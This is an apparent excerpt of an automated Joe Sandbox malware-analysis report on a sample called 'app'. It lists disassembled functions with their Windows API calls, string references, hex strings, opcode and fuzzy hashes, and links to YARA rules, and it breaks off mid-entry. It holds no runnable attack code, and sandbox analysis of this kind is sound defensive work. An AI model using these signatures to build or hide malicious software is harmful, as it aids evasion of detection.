                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: falsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,
                                                                                                                                              • API String ID: 1910495013-2845428148
                                                                                                                                              • Opcode ID: 460c726a98bc7e94708f476ea1c035732b96b3ceecb9a7a325cccec93d008849
                                                                                                                                              • Instruction ID: ad8346544ed424e01c32f094d1fbdaa111f11cc33bc2551c9b5c12077da84aba
                                                                                                                                              • Opcode Fuzzy Hash: 460c726a98bc7e94708f476ea1c035732b96b3ceecb9a7a325cccec93d008849
                                                                                                                                              • Instruction Fuzzy Hash: F7312671604200DFEF25EF20D8887E97BA6BB84309F084878DD499F296CB755899CF5A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00429CB3 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetMapMode.GDI32(?,?,?,?,?,?,0040F257,?,00000000,?,7689CA20), ref: 00429CC3
                                                                                                                                              • GetDeviceCaps.GDI32(?,00000058), ref: 00429CFD
                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 00429D06
                                                                                                                                                • Part of subcall function 0042873E: MulDiv.KERNEL32(?,00000000,00000000), ref: 0042877B
                                                                                                                                                • Part of subcall function 0042873E: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 00428796
                                                                                                                                              • MulDiv.KERNEL32(?,000009EC,00000060), ref: 00429D2A
                                                                                                                                              • MulDiv.KERNEL32(00000000,000009EC,7689CA20), ref: 00429D35
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsDevice$Mode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 696222070-0
                                                                                                                                              • Opcode ID: 8d1704f2616a026b9f43863089cc8eee421a8b68ef1a552184c7b2fb0bd61b6a
                                                                                                                                              • Instruction ID: 6e1b7dccc2bf6b9828f3aa7ea2882f5d8b0ed906ddf1c8cc2095083f4007e547
                                                                                                                                              • Opcode Fuzzy Hash: 8d1704f2616a026b9f43863089cc8eee421a8b68ef1a552184c7b2fb0bd61b6a
                                                                                                                                              • Instruction Fuzzy Hash: DD110235700610AFCB219F55DC44C1EBBF9EF89310BA1443AF98697320C7759C029F94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00429D41 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetMapMode.GDI32(?,00000000,?,?,?,?,0040F28B,?), ref: 00429D51
                                                                                                                                              • GetDeviceCaps.GDI32(?,00000058), ref: 00429D8B
                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 00429D94
                                                                                                                                                • Part of subcall function 004286DB: MulDiv.KERNEL32(0040F28B,00000000,00000000), ref: 00428718
                                                                                                                                                • Part of subcall function 004286DB: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 00428733
                                                                                                                                              • MulDiv.KERNEL32(0040F28B,00000060,000009EC), ref: 00429DB8
                                                                                                                                              • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 00429DC3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsDevice$Mode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 696222070-0
                                                                                                                                              • Opcode ID: 0b9c2ff3e9452577eaa4e4a24d119cdaa1b7e241cf6bc29e48a8d0425e4ee19a
                                                                                                                                              • Instruction ID: b40078db713edfd21a9873406d00821ab7b1675308a8c764c818c18d3d9003fc
                                                                                                                                              • Opcode Fuzzy Hash: 0b9c2ff3e9452577eaa4e4a24d119cdaa1b7e241cf6bc29e48a8d0425e4ee19a
                                                                                                                                              • Instruction Fuzzy Hash: 79110E35700610AFDB21AF15DC44C1EBBFAEF89710B91442AF98697320CB75EC02DB88
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00419CEF Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(?,77D5FBD0,0041821A,004187D7,76170A60,?,?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C,00418764), ref: 00419CF1
                                                                                                                                              • TlsGetValue.KERNEL32(?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C,00418764,76170A60,?,00419CD6,00419D7E,00415EBE), ref: 00419CFF
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C,00418764,76170A60,?,00419CD6,00419D7E,00415EBE), ref: 00419D55
                                                                                                                                                • Part of subcall function 0041D4E0: HeapAlloc.KERNEL32(00000008,?,0043B1F8,00000010,00419D17,00000001,00000088,?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C), ref: 0041D562
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,00418843,?,?,?,0041540F,00000004,0043A458,0000000C,00418764,76170A60,?,00419CD6,00419D7E,00415EBE), ref: 00419D26
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00419D3E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2020098873-0
                                                                                                                                              • Opcode ID: c0dde2ab6abc5d13967d72fca5861c1375e6e24a54f52db835ed15053f81b895
                                                                                                                                              • Instruction ID: 9c9c253482250aba246a1314c7731adacca6fb7c4ca25a5bf85d0a0605742cb6
                                                                                                                                              • Opcode Fuzzy Hash: c0dde2ab6abc5d13967d72fca5861c1375e6e24a54f52db835ed15053f81b895
                                                                                                                                              • Instruction Fuzzy Hash: 0FF0C271701B119FE7301BA0FC097967BB0EF02B65B90463AE941DA2A0CBB88C458798
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042BB89 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsFree.KERNEL32(00595A18,?,?,0042BC00,00000000,00000001), ref: 0042BBAF
                                                                                                                                              • GlobalHandle.KERNEL32(00563488), ref: 0042BBBD
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,0042BC00,00000000,00000001), ref: 0042BBC6
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0042BBCD
                                                                                                                                              • DeleteCriticalSection.KERNEL32(0044AEBC,?,?,0042BC00,00000000,00000001), ref: 0042BBD7
                                                                                                                                                • Part of subcall function 0042B9F1: EnterCriticalSection.KERNEL32(?), ref: 0042BA4E
                                                                                                                                                • Part of subcall function 0042B9F1: LeaveCriticalSection.KERNEL32(?,?), ref: 0042BA5E
                                                                                                                                                • Part of subcall function 0042B9F1: LocalFree.KERNEL32(?), ref: 0042BA67
                                                                                                                                                • Part of subcall function 0042B9F1: TlsSetValue.KERNEL32(?,00000000), ref: 0042BA79
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1549993015-0
                                                                                                                                              • Opcode ID: 42da1f527a2b0c3e69970945b8ac3fb8113e542abeed7d7280077cbdc7271ade
                                                                                                                                              • Instruction ID: c978259d00606411c06b9666accebdfa32c1b0646b29e90d722105786fdf7326
                                                                                                                                              • Opcode Fuzzy Hash: 42da1f527a2b0c3e69970945b8ac3fb8113e542abeed7d7280077cbdc7271ade
                                                                                                                                              • Instruction Fuzzy Hash: 72F090313006209BC6319B28FC08E6B37B9DF847253D50639F915D3655D728EC0686AC
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004130C1 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 282memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 004131DF
                                                                                                                                              • CoTaskMemFree.OLE32(?,?,00000000), ref: 004133C4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Task$AllocFree
                                                                                                                                              • String ID: $(
                                                                                                                                              • API String ID: 3007142545-55695022
                                                                                                                                              • Opcode ID: a16237aa7a8ee13bba94a7bacb18d3f117483b94c8521d500b5fd6c296647487
                                                                                                                                              • Instruction ID: 7e24ac4c9d61eba3cdab13b1e29302fb200f62294913ba54403eba2bb913f085
                                                                                                                                              • Opcode Fuzzy Hash: a16237aa7a8ee13bba94a7bacb18d3f117483b94c8521d500b5fd6c296647487
                                                                                                                                              • Instruction Fuzzy Hash: 7BB14D70A003099FCB14DFA9C884AAEB7F5FF88704F24495EE416EB351DB74A985CB64
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004040E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000104,?), ref: 0040410A
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • CharLowerA.USER32(?,?,00000004,?), ref: 00404141
                                                                                                                                                • Part of subcall function 00402C6D: MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharFileLowerMessageModuleNamelstrlen
                                                                                                                                              • String ID: (1D$.dll
                                                                                                                                              • API String ID: 1366549216-1666350075
                                                                                                                                              • Opcode ID: 5e346a47d57f0f3e063833318336f299f633875872b39283794376379ce5ba2e
                                                                                                                                              • Instruction ID: 03a9ba815adcd8ec93f3d37bde2f3f8c5eec0943ace6b228f8ee0bf5dcf52d0d
                                                                                                                                              • Opcode Fuzzy Hash: 5e346a47d57f0f3e063833318336f299f633875872b39283794376379ce5ba2e
                                                                                                                                              • Instruction Fuzzy Hash: EB31A171904249AEDB01EFA1CD46EEEBB78AF24308F10007EF155B21D2DB785B48CB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042A830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetMenuCheckMarkDimensions.USER32 ref: 0042A849
                                                                                                                                              • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0042A8EB
                                                                                                                                              • LoadBitmapA.USER32(00000000,00007FE3), ref: 0042A903
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2596413745-3916222277
                                                                                                                                              • Opcode ID: 99db48da26093b3bdc554be9bc4593ed5dd0760363e891f11716091b9abc253a
                                                                                                                                              • Instruction ID: 45e3c292e12f698ac8c395a513a2079db83a3a86b63308657ad0fa06f736e0d9
                                                                                                                                              • Opcode Fuzzy Hash: 99db48da26093b3bdc554be9bc4593ed5dd0760363e891f11716091b9abc253a
                                                                                                                                              • Instruction Fuzzy Hash: 9421E172A403188FEB20DF78EC88AAE7BA9EF44304F540526FD15CB292D674D446CB80
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00402C6D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                                • Part of subcall function 00401F77: InterlockedDecrement.KERNEL32(?), ref: 00401F8B
                                                                                                                                              Strings
                                                                                                                                              • 7096E8DFB9895410E31C2B9366BC3029, xrefs: 00402C91
                                                                                                                                              • F7046D1D86401363B3A65AD1DF955C613B5580562C80305B0E0429C491B9426B72F255A74DBED86AE98221EB993227B1317D2C85EE62773CE31C2B9366BC3029, xrefs: 00402CB2
                                                                                                                                              • 20000921, xrefs: 00402CC2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DecrementInterlockedMessagelstrlen
                                                                                                                                              • String ID: 20000921$7096E8DFB9895410E31C2B9366BC3029$F7046D1D86401363B3A65AD1DF955C613B5580562C80305B0E0429C491B9426B72F255A74DBED86AE98221EB993227B1317D2C85EE62773CE31C2B9366BC3029
                                                                                                                                              • API String ID: 4194868412-3646279038
                                                                                                                                              • Opcode ID: f1907d0cb0e8ebf3db968acc4532da3dd8ba0aae87a28045fc38d5a49be86aa8
                                                                                                                                              • Instruction ID: be63b5ce1a2537a5fc28513cc38743cb582c7cc1474271a0e0f7679b016a2b72
                                                                                                                                              • Opcode Fuzzy Hash: f1907d0cb0e8ebf3db968acc4532da3dd8ba0aae87a28045fc38d5a49be86aa8
                                                                                                                                              • Instruction Fuzzy Hash: 51219231E4022976DB157BE29D47EEF7A3CBF4574CF40012AB110710E2CABD8511C6A9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025BF690 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025BF1B0: HeapFree.KERNEL32(00000000,00000000), ref: 025BF223
                                                                                                                                                • Part of subcall function 025BF1B0: HeapFree.KERNEL32(00000000,?), ref: 025BF232
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll), ref: 025BF705
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 025BF715
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$AddressHandleModuleProc
                                                                                                                                              • String ID: NtWaitForKeyedEvent$ntdll
                                                                                                                                              • API String ID: 2009576768-2815205136
                                                                                                                                              • Opcode ID: 614740eaa5f97dce968e9b2229de745b3d622aa6552a4234da5c854249a0c769
                                                                                                                                              • Instruction ID: c440bc861fae6d4ccacab1a23054c9eeee730a81c33430e7945c5e284ad565bc
                                                                                                                                              • Opcode Fuzzy Hash: 614740eaa5f97dce968e9b2229de745b3d622aa6552a4234da5c854249a0c769
                                                                                                                                              • Instruction Fuzzy Hash: 760116B0648302ABE314CF25D94475BBBE9BF94748F108C1DF889D6680E778D548CFAA
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041E3E2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,0043B298,00000010,00418723,00000000,00000FA0,76170A60,00000000,00419D65,00415EBE,?,0043A478,00000060), ref: 0041E405
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 0041E415
                                                                                                                                              Strings
                                                                                                                                              • kernel32.dll, xrefs: 0041E400
                                                                                                                                              • InitializeCriticalSectionAndSpinCount, xrefs: 0041E40F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                                                              • API String ID: 1646373207-3733552308
                                                                                                                                              • Opcode ID: 5c0e4825627cfcbdc909d80ba72f3c4140fdd93ae8b2e26b687a80bbd9fc07fd
                                                                                                                                              • Instruction ID: 02de6b7c6dcb1b4e2d62259ca00e2439f61271760f3b7c106522406a4349fe20
                                                                                                                                              • Opcode Fuzzy Hash: 5c0e4825627cfcbdc909d80ba72f3c4140fdd93ae8b2e26b687a80bbd9fc07fd
                                                                                                                                              • Instruction Fuzzy Hash: 5FF0903C640206EBDB208F66AC0978E37B0FB09788F60417BA824D52A1D738D581DB5C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041C5DA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,004170FA), ref: 0041C5DF
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0041C5EF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
